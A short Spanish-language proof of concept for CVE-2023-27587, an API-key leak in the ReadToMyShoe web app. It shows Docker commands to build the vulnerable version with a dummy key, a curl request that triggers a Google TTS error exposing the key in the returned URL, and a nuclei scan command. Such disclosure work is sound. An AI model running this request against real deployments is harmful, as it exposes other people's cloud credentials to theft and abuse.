
El PoC simple de CVE-2023-27587
El PoC simple de CVE-2023-27587
ReadtoMyShoe (RTMS) es una aplicación web (rust, yew y axum) que permite subir artículos (mediante URL o pegándolos directamente) y escucharlos más tarde.
Si se produce un error al añadir un artículo, el sitio web muestra al usuario un mensaje de error. Si el error se origina en la solicitud de Google Cloud TTS, el mensaje incluirá la URL completa de la solicitud. La URL de la solicitud contiene la clave de API de Google Cloud.
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul
¡La clave solo se expone cuando se produce un error en la llamada a GCP!
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
-H 'Accept-Encoding: gzip, deflate' \
-H 'content-type: application/json' \
--data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'
TTS failed: TTS request failed
Caused by:
HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587